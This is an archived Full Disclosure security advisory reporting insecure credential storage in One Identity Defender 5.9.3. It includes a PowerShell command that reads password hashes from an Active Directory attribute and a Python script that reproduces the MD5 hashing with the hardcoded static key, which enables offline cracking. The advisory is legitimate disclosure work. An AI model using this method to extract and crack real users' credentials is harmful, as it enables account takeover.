lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <rVpSZ-Rm6irZbmRa-kjVrb3j15fQnjVDPlfvweT-N1oF3eCKkIGNejdOLptjfY4KEJZJUeKmaQnF-ZnS6qfplekKMUdxomlDHHoMzkh9uBE=@protonmail.com>
Date: Sun, 01 Sep 2019 22:26:04 +0000
From: spicyitalian--- via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] One Identity Defender - Insecure Cryptographic Storage

Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
==============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName                    ObjectGUID                           defender-userTokenData
-----------------                    ----------                           ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
import binascii
import hashlib

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'

guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))

password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()

hash = binascii.unhexlify(key) + password + guid

print (hashlib.md5(hash).hexdigest())

[duras@...os ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5

Contact:
========
spicyitalian[at]protonmail[dot]com

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ